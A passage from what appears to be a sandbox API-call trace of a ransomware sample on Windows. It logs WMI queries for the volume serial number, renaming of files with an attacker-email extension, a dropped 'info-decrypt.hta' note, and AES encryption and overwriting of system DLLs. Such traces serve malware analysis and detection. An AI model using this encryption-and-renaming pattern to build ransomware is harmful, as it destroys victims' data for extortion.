ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0181.742] WbemLocator:IUnknown:AddRef (This=0xb5b8d4) returned 0x3 [0181.742] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0181.743] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0181.746] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5b834) returned 0x0 [0181.746] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b834, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0181.746] WbemLocator:IUnknown:Release (This=0xb5b834) returned 0x3 [0181.746] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0181.746] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0181.746] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5b8bc) returned 0x0 [0181.746] WbemLocator:IRpcOptions:Query (in: This=0xb5b8bc, pPrx=0xb5b8d4, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0181.746] WbemLocator:IUnknown:Release (This=0xb5b8bc) returned 0x3 [0181.746] WbemLocator:IUnknown:Release (This=0xb5b8d4) returned 0x2 [0181.746] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0181.746] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0181.746] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x60333cc) returned 0x0 [0181.747] WbemLocator:IUnknown:AddRef (This=0x60333cc) returned 0x4 [0181.747] WbemLocator:IUnknown:Release (This=0x60333cc) returned 0x3 [0181.747] WbemLocator:IUnknown:Release (This=0x60333cc) returned 0x2 [0181.747] SysStringLen (param_1=0x0) returned 0x0 [0181.747] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030780, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0181.747] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0181.747] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0181.747] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0181.747] WbemLocator:IUnknown:AddRef (This=0xb5b8d4) returned 0x3 [0181.747] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5b8d4) returned 0x0 [0181.747] WbemLocator:IUnknown:Release (This=0xb5b8d4) returned 0x3 [0181.747] WbemLocator:IUnknown:Release (This=0xb5b8d4) returned 0x2 [0181.747] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0181.747] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0181.747] IWbemServices:GetObject (in: This=0x60333cc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6028978, ppCallResult=0x0) returned 0x0 [0181.940] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60307f0, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0181.940] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0181.940] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0181.940] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f1aa0*=0, plFlavor=0x36f1aa4*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36f1aa0*=8, plFlavor=0x36f1aa4*=0) returned 0x0 [0181.941] SysStringByteLen (bstr="9C354B42") returned 0x10 [0181.941] SysStringByteLen (bstr="9C354B42") returned 0x10 [0181.941] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f1aa0*=8, plFlavor=0x36f1aa4*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36f1aa0*=8, plFlavor=0x36f1aa4*=0) returned 0x0 [0181.941] SysStringByteLen (bstr="9C354B42") returned 0x10 [0181.941] SysStringByteLen (bstr="9C354B42") returned 0x10 [0181.941] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", lpFilePart=0x0) returned 0x42 [0181.941] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x65 [0181.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0181.941] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x256fb040, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0181.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0181.941] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0181.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", lpFilePart=0x0) returned 0x42 [0181.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta", lpFilePart=0x0) returned 0x47 [0181.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0181.964] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ecc4a0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x24ecc4a0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x24ecc4a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0181.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0181.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", lpFilePart=0x0) returned 0x42 [0181.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0181.964] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), fInfoLevelId=0x0, lpFileInformation=0x36f20a8 | out: lpFileInformation=0x36f20a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790)) returned 1 [0181.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0181.965] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", lpFilePart=0x0) returned 0x42 [0181.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0181.965] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0181.965] GetFileType (hFile=0x5a0) returned 0x1 [0181.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0181.965] GetFileType (hFile=0x5a0) returned 0x1 [0181.965] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x140790 [0181.966] ReadFile (in: hFile=0x5a0, lpBuffer=0xb335598, nNumberOfBytesToRead=0x140790, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0xb335598*, lpNumberOfBytesRead=0x6d8edac*=0x140790, lpOverlapped=0x0) returned 1 [0182.002] CloseHandle (hObject=0x5a0) returned 1 [0182.002] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0x66bafc0) returned 1 [0182.003] CryptGenRandom (in: hProv=0x66bafc0, dwLen=0x10, pbBuffer=0x36f25f0 | out: pbBuffer=0x36f25f0) returned 1 [0183.154] CryptImportKey (in: hProv=0x66bafc0, pbData=0x377e41c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f790) returned 1 [0183.154] CryptContextAddRef (hProv=0x66bafc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0183.154] CryptContextAddRef (hProv=0x66bafc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0183.155] CryptDuplicateKey (in: hKey=0xb7f790, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f650) returned 1 [0183.155] CryptContextAddRef (hProv=0x66bafc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0183.155] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x4, pbData=0x377e4fc*=0x1, dwFlags=0x0) returned 1 [0183.155] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x1, pbData=0x377e4c8, dwFlags=0x0) returned 1 [0183.719] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x15921048*, pdwDataLen=0x6d8ed78*=0x1407a0, dwBufLen=0x1407a0 | out: pbData=0x15921048*, pdwDataLen=0x6d8ed78*=0x1407a0) returned 1 [0183.733] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x377e524*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x377e524*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0183.734] CryptDestroyKey (hKey=0xb7f790) returned 1 [0183.734] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0183.734] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0183.734] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", lpFilePart=0x0) returned 0x42 [0183.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0183.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0184.753] GetFileType (hFile=0x208) returned 0x1 [0184.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0184.753] GetFileType (hFile=0x208) returned 0x1 [0184.753] WriteFile (in: hFile=0x208, lpBuffer=0x3600ce0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x3600ce0*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0184.755] CloseHandle (hObject=0x208) returned 1 [0184.755] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0184.755] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0184.755] CoTaskMemFree (pv=0xbed438) [0184.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0184.755] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0184.756] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0184.756] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0184.756] IUnknown:Release (This=0xb51e34) returned 0x1 [0184.757] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x60277f0) returned 0x0 [0184.757] WbemDefPath:IUnknown:QueryInterface (in: This=0x60277f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0184.757] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60277f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6031200) returned 0x0 [0184.758] WbemDefPath:IUnknown:Release (This=0x60277f0) returned 0x0 [0184.758] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031200, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6031200) returned 0x0 [0184.758] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031200, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0184.758] WbemDefPath:IUnknown:AddRef (This=0x6031200) returned 0x3 [0184.758] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031200, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0184.758] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031200, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0184.758] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031200, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0x66ce4b8) returned 0x0 [0184.758] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce4b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.758] WbemDefPath:IUnknown:Release (This=0x66ce4b8) returned 0x3 [0184.758] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0184.758] CoGetContextToken (in: pToken=0x6d8ddb8 | out: pToken=0x6d8ddb8) returned 0x0 [0184.758] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0184.758] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031200, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0184.758] WbemDefPath:IUnknown:Release (This=0x6031200) returned 0x2 [0184.758] WbemDefPath:IUnknown:Release (This=0x6031200) returned 0x1 [0184.758] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0184.759] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0184.759] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031200, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6031200) returned 0x0 [0184.759] WbemDefPath:IUnknown:AddRef (This=0x6031200) returned 0x3 [0184.759] WbemDefPath:IUnknown:Release (This=0x6031200) returned 0x2 [0184.759] WbemDefPath:IWbemPath:SetText (This=0x6031200, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0184.759] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031200, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0184.759] WbemDefPath:IWbemPath:GetText (in: This=0x6031200, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0184.759] WbemDefPath:IWbemPath:GetText (in: This=0x6031200, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0184.759] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031200, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0184.759] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031200, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0184.759] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031200, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0184.759] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031200, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0184.759] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031200, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0184.759] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0184.759] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0184.759] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.759] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0184.759] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0184.759] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0184.760] IUnknown:Release (This=0xb51e34) returned 0x1 [0184.760] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6027860) returned 0x0 [0184.761] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027860, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: 